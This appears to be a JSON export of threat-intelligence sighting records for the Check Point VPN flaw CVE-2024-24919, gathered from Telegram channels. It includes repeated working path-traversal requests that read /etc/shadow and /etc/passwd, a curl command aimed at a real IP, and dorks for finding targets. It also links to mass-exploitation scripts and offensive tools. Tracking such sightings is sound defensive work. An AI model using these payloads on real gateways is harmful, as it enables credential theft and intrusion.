templates4nuclei\nhttps://github.com/andersonmv/Nuclei_Templates\nhttps://github.com/pushpak-11/nuclei-templates\nhttps://github.com/chudamax/custom_nuclei_templates\nhttps://github.com/emadshanab/nuclei-bitrix-templates\nhttps://github.com/Sachinart/manual-nuclei-templates\nhttps://github.com/exploit-io/nuclei-fuzz-templates\nhttps://github.com/hackersupcoming/Nuclei_Templates\nhttps://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561\nhttps://github.com/niranc/Nuclei-personal-templates\nhttps://github.com/Loftven/BIZONE_WAF_DETECt\nhttps://github.com/YashVardhanTrip/nuclei-templates-initial-access\nhttps://github.com/Saitle/Yamilicious\nhttps://github.com/SalehLardhi/nuclei-wp-config-php\nhttps://github.com/c3rrberu5/CVE-2024-24919\nhttps://github.com/0x20c/CVE-2024-4577-nuclei\nhttps://github.com/xungzzz/CVE-2024-4956\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE\nhttps://github.com/Term1N8/nuclei-templates\nhttps://github.com/KhukuriRimal/CustomNucleiTemplates\nhttps://github.com/stuxctf/nuclei-templates-stux\nhttps://github.com/megamindmeg/Templates\nhttps://github.com/TolgaTD/Nuclei-Custom-Templates\nhttps://github.com/adibarsyad/nuclei-ios\nhttps://github.com/Sysc4ll3r/CVE-2024-4577\nhttps://github.com/adibarsyad/nuclei-jsp-source-code-review\nhttps://github.com/edoardottt/RFDos-Scanner\nhttps://github.com/banditzCyber0x/template\nhttps://github.com/sardine-web/polaris-web-reflected-xss.git\nhttps://github.com/Josekutty-K/nuclei-templates\nhttps://github.com/Mamilate/3-Nuclei-Templates\nhttps://github.com/ReksySec/3Nucleit-Templates\nhttps://github.com/Mohsenalmamun/Nuclei-Template\nhttps://github.com/K3ysTr0K3R/Custom-Nuclei-Templates\nhttps://github.com/br0wnst4n11/Custom_Nuclei_Templates\nhttps://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template\nhttps://github.com/fa-rrel/Nuclei-templates-xd \nhttps://github.com/superhexa/nuclei-templates\nhttps://github.com/ts4rin4/templates4nuclei\nhttps://github.com/jhonnybonny/nuclei-templates", "creation_timestamp": "2025-04-22T02:52:22.000000Z"}, {"uuid": "4b52520f-ffc7-4bc7-9f0c-00c887a524fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/SalaGangz/114", "content": "CVE-2024-24919 POC \ud83e\udee1 \n@SalaGangz", "creation_timestamp": "2024-09-14T07:07:54.000000Z"}, {"uuid": "9b47b0f2-72cc-42d0-9d9c-cbe02436f4f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/7Oful-PoF1YxEYxiOK53dIiPH8jdfz08z4Bl4FJsWWOrNQ", "content": "", "creation_timestamp": "2024-05-29T18:24:47.000000Z"}, {"uuid": "d546626e-7e70-4f5a-baf1-2d6b6c22814e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/4513", "content": "CVE-2024-24919\n*\nCheck Point Remote Access VPN 0-Day\n*\nFOFA link\n*\nPOC:\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#0day #checkpoint", "creation_timestamp": "2024-05-30T10:29:40.000000Z"}, {"uuid": "98013d16-1e51-4ddc-991b-2366225de54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/hRD5xM4eKsnZvtpTGyXHNwlqip2oH4Mw7UxqFHy56xRtNgY", "content": "", "creation_timestamp": "2024-05-29T20:28:26.000000Z"}, {"uuid": "63b56fcc-e97f-4144-9052-a699bd73e744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/lcmysecteamch/4826", "content": "World Wide targets for CVE-2024-24919\n\n#checkpoint", "creation_timestamp": "2024-06-20T08:09:37.000000Z"}, {"uuid": "4b60ae4f-b132-4c2e-ab12-37e144ae6623", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/178", "content": "Tools - Hackers Factory\n\nVATINT (Vehicle and Transportation Intelligence) Tools \n\nOnline services for search by VIN or License Plates numbers in different countries;\nStolen car database (Europe);\nContainer and ships tracking;\nFlights, trains, drones tracking\n\nand much more.\n\nhttps://github.com/CScorza/Tool-VATINT\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nand more.\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nSUBPROBER\n\nA simple tool for scanning a list of websites. Allows you to collect a lot of data - IP address, status code,\u00a0 title, response length, content type, redirect info etc.\n\nhttps://github.com/RevoltSecurities/SubProber\n\nAdvanced Search Tools\n\n- regional search engines\n- privacy search engines\n- search engines dorking\n- fact checking tools\n- database search tools\n\nand more.\n\nhttps://start.me/p/nRADzL/advanced-search-tools\n\nGitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC\n\n10 years of the GitHub Security Bug Bounty Program\n\nhttps://github.blog/2024-06-11-10-years-of-the-github-security-bug-bounty-program/\n\nThis page lists all the available scanning profiles shipped with Rainmap Lite.\n\nhttps://github.com/cldrn/rainmap-lite/wiki/Scanning-profiles\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.\n\nhttps://github.com/danielmiessler/SecLists\n\nOnion addresses for anything. \n\nhttps://github.com/cmars/onionpipe\n\nOneDorkForAll/dorks/1M_dork at main \u00b7 HackShiv/OneDorkForAll \u00b7 GitHub\n\nhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork\n\nPoC for using MS Windows printers for persistence / command and control via Internet Printing\nLicense\n\nhttps://github.com/Diverto/IPPrintC2\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:12:48.000000Z"}, {"uuid": "2009d8de-9a08-4681-9d18-9b18d508cc92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/168", "content": "Tools - Hackers Factory\n\nThis tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. \n\nhttps://github.com/xaitax/TotalRecall\n\nAn Event Tracing for Windows (ETW) tool that allows you to enumerate Manifest &amp; MOF providers, as well as collect events from desired providers.\n\nhttps://github.com/jsecurity101/ETWInspector\n\nSearch and browse documents and data; find the people and companies you look for. \n\nhttps://github.com/alephdata/aleph\n\nDDoS -Web Scanning -Phone Hunter -CCTV Hunter -Deface -Mass Deface -Deface Maker -Bypass Maker -Auto Bypasser -Database Dump -Dorking -Admin Finder -Wifi Jammer -Executor -Simple Dirber -Trojan Maker -Mass Dork -Doxing / Osint \n\nhttps://github.com/MrSanZz/pandora\n\nSploitScan is a sophisticated cybersecurity utility designed to provide detailed information on vulnerabilities and associated exploits. \n\nhttps://github.com/xaitax/SploitScan\n\nProgress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800) \n\nhttps://github.com/sinsinology/CVE-2024-4358\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nNew release of OneDriveExplorer. Mainly fixes for null value errors\n\nhttps://github.com/Beercow/OneDriveExplorer/releases/tag/v2024.05.17\n\nDLLirant is a tool to automatize the DLL Hijacking researches on a specified binary. \n\nhttps://github.com/redteamsocietegenerale/DLLirant\n\nAD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses \n\nhttps://github.com/Mazars-Tech/AD_Miner\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:10:12.000000Z"}, {"uuid": "bb247d87-6475-4099-b385-6d7aa797dba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/164", "content": "Tools - Hackers Factory\n\nGourlex \n\nIt is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.\n\nTry the tool :\u00a0 https://github.com/trap-bytes/gourlex\n\nFind xss with this automation of the following work :\n\n1. subfinder -d indeed.com -o indeed.txt //Find Subdomains\n2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains\n3. echo \"indeed.com\" | gau --threads 5 &gt;&gt; Enpoints.txt // Find Endpoints\n4. cat httpx.txt | katana -jc &gt;&gt; Enpoints.txt // Find More Endpoints\n5. cat Enpoints.txt | uro &gt;&gt; Endpoints_F.txt // Remove Duplicates\n6. cat Endpoints_F.txt | gf xss &gt;&gt; XSS.txt // Filter Endpoints for XSS\n7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters\n8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS\n\nScript : https://github.com/dirtycoder0124/xss\n\nA simple powershell script that can run in powershell for linux. The purpose of the script is to identify potential privilege escalation vulnerabilities on Linux systems that run with PowerShell\n\nhttps://github.com/tjnull/pentest-arsenal/tree/main/Cadiclus\n\nInQL makes mapping out a GraphQL API easy! It also includes several automated vulnerability checks!\u00a0 \n\ngithub.com/doyensec/inql\n\nA Microservices-based framework for the study of Network Security and Penetration Test techniques \n\nhttps://github.com/DockerSecurityPlayground/DSP\n\nSnaffler reimplementation in Python -\n\nhttps://github.com/SnaffCon/Snaffler\nhttps://github.com/asmtlab/snafflepy\n\nCVE-2024-24919 \n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nExtract endpoints from APK files \n\nhttps://github.com/ndelphit/apkurlgrep\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:09:19.000000Z"}, {"uuid": "2a7d85dd-b318-4eb2-b29b-ceb8b96cb086", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/414", "content": "For this vulnerability, just type shodan title:\"Check Point\" ssl:\"target\"\n\nCVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nhost: target\nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#SSLVPN  #BugBounty", "creation_timestamp": "2024-07-15T19:28:49.000000Z"}, {"uuid": "e5c6a7d4-0345-4249-b24b-c5990265b237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/163", "content": "Tools - Hackers Factory\n\nGraphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint. \n\nhttps://github.com/dolevf/graphw00f\n\nSecurity Auditor Utility for GraphQL APIs \n\nhttps://github.com/dolevf/graphql-cop\n\nA toolkit for testing, tweaking and cracking JSON Web Tokens \n\nhttps://github.com/ticarpi/jwt_tool\n\nSearch Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. \n\nhttps://github.com/Zarcolio/sitedorks\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities. \n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nThis checklist may help you to have a good methodology for bug bounty hunting\n\nhttps://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md\n\nJS Fuzzing - LazyEgg\n\nhttps://github.com/schooldropout1337/lazyegg/?s=08\n\nCheck point: CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nBurp Extension to find potential endpoints, parameters, and generate a custom target wordlist \n\nhttps://github.com/xnl-h4ck3r/GAP-Burp-Extension\n\nLive Feed of C2 servers, tools, and botnets \n\nhttps://github.com/montysecurity/C2-Tracker\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:09:06.000000Z"}, {"uuid": "6defe515-0e56-4403-aada-b62dc5e987c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/xlZiONeJ7uAWsOneSgMpqpFbElW-tpoYvHZjYKMWl6H38CU", "content": "", "creation_timestamp": "2024-06-07T14:12:24.000000Z"}, {"uuid": "30ecd7f7-7bdf-47cf-8eef-46a2c683faa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7979", "content": "Tools - Hackers Factory\n\nVATINT (Vehicle and Transportation Intelligence) Tools \n\nOnline services for search by VIN or License Plates numbers in different countries;\nStolen car database (Europe);\nContainer and ships tracking;\nFlights, trains, drones tracking\n\nand much more.\n\nhttps://github.com/CScorza/Tool-VATINT\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nand more.\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nSUBPROBER\n\nA simple tool for scanning a list of websites. Allows you to collect a lot of data - IP address, status code,\u00a0 title, response length, content type, redirect info etc.\n\nhttps://github.com/RevoltSecurities/SubProber\n\nAdvanced Search Tools\n\n- regional search engines\n- privacy search engines\n- search engines dorking\n- fact checking tools\n- database search tools\n\nand more.\n\nhttps://start.me/p/nRADzL/advanced-search-tools\n\nGitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC\n\n10 years of the GitHub Security Bug Bounty Program\n\nhttps://github.blog/2024-06-11-10-years-of-the-github-security-bug-bounty-program/\n\nThis page lists all the available scanning profiles shipped with Rainmap Lite.\n\nhttps://github.com/cldrn/rainmap-lite/wiki/Scanning-profiles\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.\n\nhttps://github.com/danielmiessler/SecLists\n\nOnion addresses for anything. \n\nhttps://github.com/cmars/onionpipe\n\nOneDorkForAll/dorks/1M_dork at main \u00b7 HackShiv/OneDorkForAll \u00b7 GitHub\n\nhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork\n\nPoC for using MS Windows printers for persistence / command and control via Internet Printing\nLicense\n\nhttps://github.com/Diverto/IPPrintC2\n\n#HackersFactory", "creation_timestamp": "2024-06-17T09:53:50.000000Z"}, {"uuid": "437451b5-ec26-474e-b17b-988c2a28eed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "Telegram/STSDebc9aAG11LJSkCmWQ4m9yqL68Iql8cp7jzF1yMRHjGs", "content": "", "creation_timestamp": "2024-06-06T21:29:28.000000Z"}, {"uuid": "0b76742b-feb1-412e-a23c-92826b314c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/tengkorakcybercrewz/3095", "content": "", "creation_timestamp": "2024-07-24T12:45:42.000000Z"}, {"uuid": "e40a565e-feba-41ec-9a85-2fc584ec31eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/554", "content": "Check-point CVE-2024-24919 allow unauthorized user to read internal files\n\nVulnerability Summary:\n\nA critical path traversal vulnerability (CVE-2024-24919) has been identified on the server hosted at example.com. This vulnerability allows an attacker to access sensitive files on the server, including the /etc/passwd file, which can lead to unauthorized access and potential system compromise.\n\nSteps to Reproduce:\n\nTo reproduce the vulnerability, follow these steps:\n\n1. Visit the website: https://example.com/\n2. Navigate to the path /clients/MyCRL and intercept the request using a third-party proxy tool (e.g., Burp Suite).\n3. Send the intercepted request to the repeater.\n4. Modify the request method to POST and enter the following payload in request body : aCSHELL/../../../../../../../etc/passwd.\n\nThe modified request should look like this:\n\nPOST /clients/MyCRL HTTP/1.1 \nHost: example.com \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/passwd\n\n//also you can do this by simple curl command just change the ip address of host and url:\n\ncurl --path-as-is -i -s -k -X $'POST' \\\n -H $'Host: 212.179.13.8' -H $'Content-Length: 39' -H $'Connection: keep-alive' \\\n --data-binary $'aCSHELL/../../../../../../../etc/passwd' \\\n $'https://212.179.13.8/clients/MyCRL'\n\nImpact:\n\nThis vulnerability allows attackers to perform directory traversal attacks, accessing sensitive files on the server. Specifically, by accessing the /etc/passwd file, attackers can obtain information about system users, which can be leveraged to further compromise the system. This could lead to:\n\n* Unauthorized access\n* Data breaches\n* Potential control over the affected server\n\nPoc Attached !\n\nRecommendation:\n\nIt is crucial to address this vulnerability immediately to prevent any exploitation. I recommend that the server administrators take the following steps:\n\n1. Patch the vulnerability as soon as possible.\n2. Implement additional security measures to prevent directory traversal attacks.\n3. Conduct a thorough security audit to identify and remediate any other potential vulnerabilities.\n\nBy addressing this vulnerability, you can prevent unauthorized access and potential system compromise, ensuring the security and integrity of your server and data.\nPlease let us know if you need any further assistance or clarification regarding this vulnerability.\n\nRegards \nCoffinxp\nSecurity Researcher\n------------------------------------------------------\nuse this format and report to the vulnerable org..if u need any help dm me", "creation_timestamp": "2024-06-03T09:54:52.000000Z"}, {"uuid": "1c7664e5-f5e3-41ac-b55a-b80bf0ebdfdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/547", "content": "Try this script to exploit all vulnerable ip's list: CVE-2024-24919\nhttps://github.com/seed1337/CVE-2024-24919-POC", "creation_timestamp": "2024-06-01T13:44:10.000000Z"}, {"uuid": "5bbbdc99-014d-4e4b-ac93-a1183e231ef8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/537", "content": "Check point:CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\ntemplates:https://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml", "creation_timestamp": "2024-05-31T06:15:15.000000Z"}, {"uuid": "a9c86595-2aeb-4d79-99e3-e8a70d66bfa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/-sYaz5AJH4IxxC--oJ2b6sxd0dH8qdItrfV0sHuZ7hmla8o", "content": "", "creation_timestamp": "2024-08-22T10:54:42.000000Z"}, {"uuid": "5f6d7aa8-eeeb-4e4c-9a64-3e8fdc0b9a31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/137970", "content": "https://github.com/c3rrberu5/CVE-2024-24919\n\nNuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.\n\n#github exploit", "creation_timestamp": "2024-05-30T14:54:10.000000Z"}, {"uuid": "b0ff3ca8-e952-4e53-b6e8-6146c5d1c7c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/137963", "content": "CVE-2024-24919\n*\nCheck Point Remote Access VPN 0-Day\n*\nFOFA link\n*\nPOC:\nPOST /clients/MyCRL HTTP/1.1\nHost: \nContent-Length: 39\n\naCSHELL/../../../../../../../etc/shadow\n\n#0day #checkpoint", "creation_timestamp": "2024-05-30T11:05:19.000000Z"}, {"uuid": "13fe4f3b-a38f-4480-86b9-0bf7a7236bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/1808", "content": "The Hacker News\nCheck Point Warns of Zero-Day Attacks on its VPN Gateway Products\n\nCheck Point is warning of a zero-day vulnerability in its Network Security gateway products that threat actors have exploited in the wild.\nTracked as CVE-2024-24919, the issue impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark appliances.\n\"The vulnerability potentially allows an attacker to read certain information on", "creation_timestamp": "2024-05-29T19:56:53.000000Z"}, {"uuid": "28110940-5462-41cf-925f-19569e543b9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/KomunitiSiber/2020", "content": "Check Point Warns of Zero-Day Attacks on its VPN Gateway Products\nhttps://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html\n\nCheck Point is warning of a zero-day vulnerability in its Network Security gateway products that threat actors have exploited in the wild.\nTracked as CVE-2024-24919, the issue impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark appliances.\n\"The vulnerability potentially allows an attacker to read certain information on", "creation_timestamp": "2024-05-29T18:31:46.000000Z"}, {"uuid": "cb27eb7b-c193-4e07-8924-dcf9c718b906", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/xLXguaco0N9RxDSSW-0GA8Q4IWyprW3gvLw9_wMk-T0ei8Q", "content": "", "creation_timestamp": "2025-02-20T13:27:13.000000Z"}, {"uuid": "ed12e27b-9034-4dd9-a1fb-986a7377ccfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/DvuDNxze_YZP63w_5nmwzbWYZFvCKfCkB4_qbONMONwQISA", "content": "", "creation_timestamp": "2025-02-05T16:00:09.000000Z"}, {"uuid": "7a408f18-7146-4c86-906f-d9534704808b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7918", "content": "Tools - Hackers Factory\n\nThis tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. \n\nhttps://github.com/xaitax/TotalRecall\n\nAn Event Tracing for Windows (ETW) tool that allows you to enumerate Manifest &amp; MOF providers, as well as collect events from desired providers.\n\nhttps://github.com/jsecurity101/ETWInspector\n\nSearch and browse documents and data; find the people and companies you look for. \n\nhttps://github.com/alephdata/aleph\n\nDDoS -Web Scanning -Phone Hunter -CCTV Hunter -Deface -Mass Deface -Deface Maker -Bypass Maker -Auto Bypasser -Database Dump -Dorking -Admin Finder -Wifi Jammer -Executor -Simple Dirber -Trojan Maker -Mass Dork -Doxing / Osint \n\nhttps://github.com/MrSanZz/pandora\n\nSploitScan is a sophisticated cybersecurity utility designed to provide detailed information on vulnerabilities and associated exploits. \n\nhttps://github.com/xaitax/SploitScan\n\nProgress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800) \n\nhttps://github.com/sinsinology/CVE-2024-4358\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nNew release of OneDriveExplorer. Mainly fixes for null value errors\n\nhttps://github.com/Beercow/OneDriveExplorer/releases/tag/v2024.05.17\n\nDLLirant is a tool to automatize the DLL Hijacking researches on a specified binary. \n\nhttps://github.com/redteamsocietegenerale/DLLirant\n\nAD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses \n\nhttps://github.com/Mazars-Tech/AD_Miner\n\n#HackersFactory", "creation_timestamp": "2024-06-07T16:48:50.000000Z"}, {"uuid": "bd0a20e7-05eb-46d1-8d6d-e21ef7aa242e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/22052", "content": "Tools - Hackers Factory\n\nVATINT (Vehicle and Transportation Intelligence) Tools \n\nOnline services for search by VIN or License Plates numbers in different countries;\nStolen car database (Europe);\nContainer and ships tracking;\nFlights, trains, drones tracking\n\nand much more.\n\nhttps://github.com/CScorza/Tool-VATINT\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nand more.\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nSUBPROBER\n\nA simple tool for scanning a list of websites. Allows you to collect a lot of data - IP address, status code,\u00a0 title, response length, content type, redirect info etc.\n\nhttps://github.com/RevoltSecurities/SubProber\n\nAdvanced Search Tools\n\n- regional search engines\n- privacy search engines\n- search engines dorking\n- fact checking tools\n- database search tools\n\nand more.\n\nhttps://start.me/p/nRADzL/advanced-search-tools\n\nGitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC\n\n10 years of the GitHub Security Bug Bounty Program\n\nhttps://github.blog/2024-06-11-10-years-of-the-github-security-bug-bounty-program/\n\nThis page lists all the available scanning profiles shipped with Rainmap Lite.\n\nhttps://github.com/cldrn/rainmap-lite/wiki/Scanning-profiles\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.\n\nhttps://github.com/danielmiessler/SecLists\n\nOnion addresses for anything. \n\nhttps://github.com/cmars/onionpipe\n\nOneDorkForAll/dorks/1M_dork at main \u00b7 HackShiv/OneDorkForAll \u00b7 GitHub\n\nhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork\n\nPoC for using MS Windows printers for persistence / command and control via Internet Printing\nLicense\n\nhttps://github.com/Diverto/IPPrintC2\n\n#HackersFactory", "creation_timestamp": "2024-06-17T09:55:26.000000Z"}, {"uuid": "d7412ffa-7f71-49f1-be4f-f7c2eb215e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21882", "content": "Tools - Hackers Factory\n\nThis tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. \n\nhttps://github.com/xaitax/TotalRecall\n\nAn Event Tracing for Windows (ETW) tool that allows you to enumerate Manifest &amp; MOF providers, as well as collect events from desired providers.\n\nhttps://github.com/jsecurity101/ETWInspector\n\nSearch and browse documents and data; find the people and companies you look for. \n\nhttps://github.com/alephdata/aleph\n\nDDoS -Web Scanning 